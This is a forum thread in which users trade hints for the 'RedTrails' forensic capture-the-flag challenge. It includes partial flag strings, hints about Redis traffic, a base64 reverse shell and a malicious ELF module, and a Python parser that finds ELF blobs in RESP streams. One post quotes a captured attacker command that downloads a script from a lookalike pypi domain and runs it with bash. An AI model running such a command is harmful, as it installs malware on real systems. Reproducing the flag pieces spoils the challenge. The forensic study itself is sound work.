redtrails forensic challenge
by yolocalman - Sunday August 11, 2024 at 06:49 PM
#1
I have found the following 2/3 parts of the flag:

_c0uld_0p3n_n3w

HTB{r3d15_1n574nc35

But I can't find the final one. I think that it is the output of the command: wget --no-check-certificate -O gezsdSC8i3 'https://files.pypi-install.com/packages/gezsdSC8i3' && bash gezsdSC8i3

Can somebody help me to find the final part?
Reply
#2
Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the TCP stream almost at the beginning, in a bulk string, an array, or somewhere around that place.
For the second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated, then decrypted; the second part is hidden behind the encrypted string.
The third part is the trickiest, yes. Trace the TCP streams; you will find 3 hexadecimal strings which seem like the output of Redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an ELF header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.
Reply
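As an added example (not code from this thread or the challenge), here is a small Python RESP parser that walks a reassembled Redis TCP stream like the one described above and flags any bulk string whose hexadecimal payload begins with an ELF header. The stream it parses is constructed sample data, not the challenge capture.

```python
# Added example: parse RESP (Redis protocol) values from a reassembled TCP
# stream and flag bulk strings carrying a hex-encoded ELF image.
import re

ELF_MAGIC = b"\x7fELF"

def parse_resp(buf, pos=0):
    """Parse one RESP value at buf[pos]; return (value, next_pos)."""
    kind = buf[pos:pos + 1]
    end = buf.index(b"\r\n", pos)
    line = buf[pos + 1:end]
    nxt = end + 2
    if kind in (b"+", b"-"):            # simple string / error
        return line.decode(), nxt
    if kind == b":":                    # integer
        return int(line), nxt
    if kind == b"$":                    # bulk string ($-1 is a null reply)
        n = int(line)
        if n < 0:
            return None, nxt
        return buf[nxt:nxt + n], nxt + n + 2
    if kind == b"*":                    # array of n nested values
        items = []
        for _ in range(int(line)):
            item, nxt = parse_resp(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError(f"unknown RESP type {kind!r} at offset {pos}")

def parse_stream(buf):
    """Parse every top-level RESP value in a reassembled stream."""
    values, pos = [], 0
    while pos < len(buf):
        value, pos = parse_resp(buf, pos)
        values.append(value)
    return values

def find_elf_blobs(values):
    """Return decoded bulk strings that are hex text starting with an ELF header."""
    hits = []
    for v in values:
        if isinstance(v, list):
            hits.extend(find_elf_blobs(v))
        elif isinstance(v, bytes) and len(v) % 2 == 0 and re.fullmatch(rb"[0-9a-fA-F]+", v):
            raw = bytes.fromhex(v.decode())
            if raw.startswith(ELF_MAGIC):
                hits.append(raw)
    return hits

# Constructed sample stream: a command array, a hex reply that is not ELF,
# a simple-string reply, and a hex reply whose first bytes are the ELF magic.
SAMPLE = (b"*2\r\n$3\r\nGET\r\n$10\r\ngezsdSC8i3\r\n" b"$8\r\ndeadbeef\r\n"
          b"+OK\r\n" b"$24\r\n7f454c460201010000000000\r\n")
```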
#3
(Aug 11, 2024, 07:58 PM)peRd1 Wrote: Yeah, sure. Good job finding the first 2 parts of the flag. Indeed it has three parts.

The first part is in the TCP stream almost at the beginning, in a bulk string, an array, or somewhere around that place.
For the second part you found an obfuscated script, which contained a reverse shell in base64. The script needs to be deobfuscated, then decrypted; the second part is hidden behind the encrypted string.
The third part is the trickiest, yes. Trace the TCP streams; you will find 3 hexadecimal strings which seem like the output of Redis. It's a suspicious module with some random name, some gibberish filename.
How do we find this module? Well, it should be something with an ELF header, right? Now try disassembling. What do you find? It performs some encryption. How do we reverse this process? Decrypt.
To do so, we need to find the key and the IV. Locate these, reverse the encryption, and if you decrypt the ciphertext you end up with part 3 of the flag.

And that's about it. Good luck.

Hey perd1, thanks for the reply and the tips! I will give you rep!
Reply